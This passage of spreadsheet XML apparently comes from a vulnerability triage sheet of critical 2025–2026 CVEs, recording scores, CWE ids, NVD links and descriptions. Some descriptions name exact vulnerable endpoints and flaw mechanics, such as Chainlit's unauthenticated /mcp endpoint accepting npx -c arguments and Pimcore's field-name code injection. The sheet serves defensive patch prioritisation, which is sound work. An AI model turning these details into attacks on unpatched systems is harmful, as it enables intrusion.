      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55634</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.9</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2026-08-28</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-94</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, the class-definition import endpoint /pimcore-studio/api/class/definition/configuration-view/detail/{id}/import accepts a DataObject field name that is emitted without an identifier allowlist by lib/DataObject/ClassBuilder/FieldDefinitionPropertiesBuilder.php into generated PHP properties and by models/DataObject/ClassDefinition/Helper/Dao.php into ALTER TABLE identifiers. An authenticated user with the objects permission can inject PHP syntax into the generated DataObject class, causing attacker-controlled code in generated var/classes/DataObject/.php files to run when an object of that class is instantiated, and can also inject SQL identifier content into schema-changing statements. The central models/DataObject/ClassDefinition/Data.php::setName() validation did not reject semicolons, braces, backticks, spaces, or other non-identifier characters. This issue is fixed in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55634</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62283</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&amp;M tool. Nezha versions 1.14.13 through 1.14.14 and 2.0.0 through 2.0.9 do not bind stream identifiers created by CreateStream in service/rpc/io_stream.go to their creating user, and `GET /ws/terminal/:id` and `GET /ws/file/:id` only check whether the supplied UUID exists. An authenticated RoleMember who obtains a live stream UUID from logs, browser history, referer data, or telemetry can attach to another user's terminal or file-manager session, read and write target-server files, and execute shell commands. This issue is fixed in version 2.0.10.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62283</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67401</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in cPanel allows a mail-enabled account to achieve remote code execution as root through SQLi in EmailTrack component</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67401</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67066</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in oasys sysoa version 1.0 allows a remote attacker to execute arbitrary code via the outtype parameter in the /outaddresspaging path</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67066</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70290</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability in the ZFS filesystem support can be triggered by malformed on-disk metadata. The issue may result in incorrect memory allocation followed by out-of-bounds memory access, potentially leading to a crash or arbitrary code execution during the boot process.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70290</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70293</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability exists in function ext4fs_get_bgdtable, the size calculation can lead to under allocation and this underallocated buffer will be used in memcpy() which could lead to arbitrary code execution, a denial of service, or other unspecified impacts.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70293</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21095</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in DNG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21095</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21096</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in JPEG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21096</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-36433</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>An issue in Actions Semiconductor Co. Ltd Tool- Media Player Utilities v.4.46 allows a physically proximate attacker execute arbitrary code via the Production.dll and RdiskUpgrade.exe components</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-36433</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37006</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the WebSocket endpoint of gpt-researcher v0.14.7 and before allows an unauthenticated remote attacker to achieve code execution via malicious Model Context Protocol configurations.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37006</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37751</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the killSessionSync function (lib/agent-runtime.ts) of 23blocks-OS ai-maestro v0.24.17 allows attackers to execute arbitrary commands via a crafted input.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37751</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41871</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')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S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41871</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45018</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For stdio transport, the endpoint accepts a user-controlled fullCommand string. The validate_mcp_command() function in backend/chainlit/mcp.py checks only the executable name against config.features.mcp.stdio.allowed_executables and passes unchecked arguments to StdioServerParameters in backend/chainlit/server.py. Because npx supports the -c argument, an attacker can execute arbitrary shell commands with the privileges of the Chainlit process. If allowed_executables is unset, its None default is treated as allowing every executable. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45018</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50894</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>easyadmin v2.0.2.2 is vulnerable to Unrestricted Upload of File with Dangerous Type in the background management interface which allows authenticated remote attackers to execute arbitrary code and gain server privileges via a crafted file upload.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50894</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52103</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>A zero-click remote code execution (RCE) vulnerability in the /Terminal/Notification.hs component of SimpleX Chat before v6.5 allows attackers to execute arbitrary commands in the context of the application without user interaction via sending a crafted payload in a text message.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52103</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52490</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the process_command_opts() function in tools/tiffcrop.c</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52490</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53611</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>Looking Glass is a modern, stateless network-diagnostic platform — a single self-contained Go binary that fronts a fleet of routers over SSH and exposes ping / traceroute / BGP lookups through a gRPC (ConnectRPC) API, an embedded SvelteKit web UI, and a lg-cli client. Prior to version 1.3.5, there is an OS Command Injection vulnerability resulting from an unanchored regular expression in the input validation layer. This issue has been patched in version 1.3.5.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53611</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54569</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
